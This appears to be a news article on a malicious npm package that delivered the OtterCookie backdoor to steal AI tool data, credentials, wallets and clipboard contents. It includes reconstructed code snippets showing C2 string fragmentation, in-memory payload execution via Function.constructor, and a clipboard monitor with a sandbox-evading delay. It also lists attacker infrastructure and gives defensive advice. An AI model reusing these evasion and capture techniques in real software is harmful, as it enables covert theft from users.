Hackers Use Fake Gemini npm Package to Steal Tokens From Claude, Cursor, and Other AI Tools

By News Room · April 7, 2026 (updated April 8, 2026) · 8 min read

The Shadow Play in Our Digital Backyard: How AI Developers Became the Unwitting Targets of a Sneaky Cyber Attack

Imagine you’re a builder, meticulously crafting something new and innovative, using the best tools available. You trust these tools because, well, they’re part of your craft. Now, imagine a seemingly helpful new tool appears on your workbench. It looks legitimate, promises to streamline a common task, and comes from what appears to be a reputable source. You install it, excited to boost your productivity. What you don’t know is that this “tool” is a Trojan horse, designed to quietly ransack your entire workspace, stealing your blueprints, your private conversations, and the very keys to your digital kingdom. This isn’t a scene from a spy movie; it’s the real-world scenario that unfolded on March 20, 2026, when a malicious npm package called gemini-ai-checker was unleashed, targeting the very heart of the AI development community.

This wasn’t just any cyberattack; it was a sophisticated operation aimed squarely at the people shaping the future of artificial intelligence. The attacker, operating under the deceptive alias gemini-check, published a package that looked like a simple utility to verify Google Gemini AI tokens. It was a wolf in sheep’s clothing, meticulously designed to appear harmless and helpful. The package’s README even cleverly copied portions of a legitimate JavaScript library, chai-await-async, to boost its credibility. This was a classic tactic to lull developers into a false sense of security: if some parts looked familiar and trustworthy, surely the whole package was too. For the keen-eyed, though, this was a red flag – why would a “Gemini AI checker” borrow text from an unrelated testing library? Sadly, in the fast-paced world of development, where convenience often trumps scrutiny, many developers likely overlooked this subtle but critical discrepancy.

Once installed, the true nature of the gemini-ai-checker began to unfold. Without a whisper, it connected to a staging server hosted on Vercel, a popular cloud platform, operating under the innocuous-sounding address server-check-genimi.vercel.app. From this clandestine location, it downloaded and executed a JavaScript payload directly onto the victim’s machine. This is where the plot thickened. Analysts at Cyber and Ramen quickly recognized the payload: it was OtterCookie, a notorious JavaScript backdoor, and its fingerprints were unmistakable. OtterCookie is a weapon frequently wielded by the “Contagious Interview” campaign, an operation that has been firmly linked to North Korean (DPRK) threat actors. This wasn’t a random act of digital vandalism; it was a calculated move by a state-sponsored entity, deploying a proven tool for intelligence gathering. The version of OtterCookie discovered in this attack was almost identical to a variant Microsoft had documented just months prior, a variant that had been actively pilfering data since October 2025. This revealed a long-standing, persistent threat, now adapting its tactics to exploit the booming world of AI.

The plot didn’t stop with gemini-ai-checker. The same cunning attacker also maintained two other npm packages: express-flowlimit and chai-extensions-extras. What tied these disparate packages together was their shared infrastructure, all pointing back to the same Vercel servers. By the time this insidious activity came to light, these three packages combined had amassed over 500 downloads. Even after gemini-ai-checker was promptly removed just before April Fool’s Day in 2026 – a darkly ironic timing – the other two continued to operate, silently gathering victims and data.

What made this particular campaign so alarming, and so distinct, was its laser focus on AI developer tools. This wasn’t merely a scattershot attempt to steal generic credentials or cryptocurrency. This malware was precisely engineered to dig into the digital nooks and crannies of AI development environments. It targeted specific directories used by popular tools like Cursor, Claude, Windsurf, PearAI, Gemini CLI, and Eigent AI. This meant the attackers weren’t just stealing passwords; they were aiming for the crown jewels: developer API keys – the digital keys to various AI services, conversation logs – potentially revealing proprietary information or sensitive research, and source code – the intellectual property at the heart of AI innovation. The intent was clear: to compromise the very foundations upon which new AI technologies are built.

The infection mechanism itself was a masterclass in stealth, designed to evade detection at every turn. The gemini-ai-checker package, though purporting to be a simple utility, was surprisingly large, clocking in at 271KB spread across 44 files and listing four dependencies. This was far more substantial than a genuine token checker, but this bulk was a deliberate design choice. It was structured to mimic a legitimate, modern project, even boasting a SECURITY markdown file. This file was a carefully placed piece of window dressing, designed to enhance the package’s perceived trustworthiness and authenticity, making it less likely for a vigilant developer to question its contents. Deeper within the package, the file libconfig.js was a testament to the attacker’s sophistication. Instead of storing a complete, easily scannable URL for its command-and-control (C2) server, it cleverly fragmented the C2 configuration – things like the staging domain, authentication token, path, and bearer token – into separate variables. This fragmentation was a deliberate strategy to break up any easily detectable strings, effectively rendering traditional scanning tools blind to the malicious intent.
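The fragmentation trick is easier to see in code. The following is an illustrative reconstruction of the pattern, not the actual contents of libconfig.js; every value is a harmless placeholder.

```javascript
// Illustrative reconstruction of the string-fragmentation pattern
// (placeholder values only, not the real indicators). No complete URL
// literal ever appears in the file, so signature-based string scanners
// have nothing to match on.
const scheme = "https" + "://";
const host = ["server", "check", "example"].join("-"); // typosquat-style host
const zone = ".vercel.app";
const route = "/" + ["api", "stage"].join("/");

// The pieces are only reassembled at call time.
function buildEndpoint() {
  return scheme + host + zone + route;
}
```

Defensively, this is why scanning for literal indicator URLs is insufficient: detection has to key on behavior (unexpected outbound requests from an install step) rather than on strings.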

When a developer installed the package, another file, libcaller.js, sprang to life. It meticulously reassembled these fragmented pieces of information and, like a digital whisper, sent an HTTP GET request to the Vercel endpoint. To ensure success, it was programmed to retry up to five times, relentlessly attempting to establish contact until a valid response was received. But even then, the attacker had contingencies. If the server responded with a 404 error but the response still contained a specific “token” field, the payload didn’t write itself to disk – a common giveaway for security software. Instead, it was executed directly in memory using Function.constructor. This was a highly deliberate choice, designed to bypass static analysis tools that are specifically trained to flag the eval function, a more traditionally detectable method of code execution. Because nothing was written to disk, and the execution method was carefully chosen, this made the attack profoundly difficult for conventional security tools to detect. It was like a ghost in the machine, leaving no physical trace.
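A minimal sketch of the two behaviors described here, with a benign inline string standing in for the downloaded payload. The retry helper mirrors the reported “up to five attempts” logic, and `Function.constructor` compiles the string without touching disk or calling `eval`.

```javascript
// Sketch of the reported retry-then-execute-in-memory flow. The "payload"
// in the test below is a harmless arithmetic string, not real malware.
async function fetchWithRetry(fetchFn, maxAttempts = 5) {
  // Mirror the "retry up to five times" behavior described above.
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    try {
      const body = await fetchFn();
      if (body) return body;
    } catch (err) {
      // Swallow the error and try again on the next iteration.
    }
  }
  return null;
}

function runInMemory(source) {
  // Function.constructor compiles a string into a callable without eval()
  // and without the payload ever being written to the filesystem.
  const fn = Function.constructor("ctx", source);
  return fn({});
}
```

Because `eval` is the pattern most static analyzers flag, routing execution through the `Function` constructor is a small change that defeats a surprisingly large share of off-the-shelf scanning rules.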

Once the payload was decoded, its complex architecture was revealed: a four-module system, each operating as a separate Node.js process and connecting to the C2 server at 216.126.237.71 across dedicated ports. Imagine a specialized team of digital burglars, each with a distinct role. Module 0 was the stealthiest, establishing remote access through Socket.IO, opening a hidden backdoor for the attackers to come and go as they pleased. Module 1 was the digital pickpocket, targeting browser databases to steal login credentials and eyeing over 25 cryptocurrency wallets, including popular ones like MetaMask and Exodus – a significant haul for any attacker. Module 2 was the digital scavenger, sweeping the victim’s home directory for sensitive file types and, crucially, explicitly enumerating those specialized AI tool directories we mentioned earlier. This wasn’t a general search; it was a targeted hunt for the specific data central to AI development. Finally, Module 3 acted as a constant surveillance agent, monitoring the clipboard every 500 milliseconds for any copied data, and cleverly employing a 3,000-millisecond startup delay to slip past sandbox detection — a digital “wait-and-see” to avoid immediate scrutiny.
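The timing pattern attributed to Module 3 can be sketched as follows. Only the 500 ms poll interval and the 3,000 ms startup delay come from the report; everything else is an assumed shape, and a plain object stands in for any real clipboard access.

```javascript
// Timing-pattern sketch for the clipboard module (assumed internals; only
// the poll interval and startup delay are from the report).
function startMonitor(clipboard, onCapture, { startupDelayMs = 3000, pollMs = 500 } = {}) {
  let last = null;
  // The startup delay lets short-lived sandbox runs finish before the
  // monitor does anything observable.
  setTimeout(() => {
    setInterval(() => {
      const current = clipboard.read();
      if (current !== last) {
        last = current; // forward only changes, not every poll
        onCapture(current);
      }
    }, pollMs);
  }, startupDelayMs);
}
```

The deduplication matters to the attacker as much as the polling: sending every 500 ms read upstream would flood the C2 channel and make the traffic far easier to spot.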

For all of us who rely on or contribute to the digital world, this attack serves as a stark reminder. Defenders, or those of us responsible for securing digital infrastructure, should be actively blocking or closely monitoring all outbound connections to Vercel, especially from development environments. Microsoft has even published specific KQL queries, powerful search commands, to help detect suspicious Node.js process behavior, and these should be a mandatory part of any security team’s arsenal.

But the responsibility doesn’t lie solely with security professionals. Developers, the very lifeblood of innovation, must cultivate a heightened sense of vigilance. Before integrating any new npm package, no matter how appealing, a thorough verification of its contents is paramount. Scrutinizing README documentation for mismatches with package names, or any other inconsistencies, is a basic but critical step. And perhaps most importantly, developers must elevate the security of their AI tool directories – folders like .cursor and .claude – to the same level of sensitivity and protection as their .ssh or .aws directories. These folders increasingly hold equally sensitive, if not more valuable, intellectual property.

Finally, the strength of the community lies in collective action. Promptly reporting any newly published packages that attempt to spoof well-known brands is crucial. By acting quickly and collaboratively, we can help the broader development community respond to these threats before they inflict further damage, ensuring that the builders of our AI future can work in a truly secure environment.
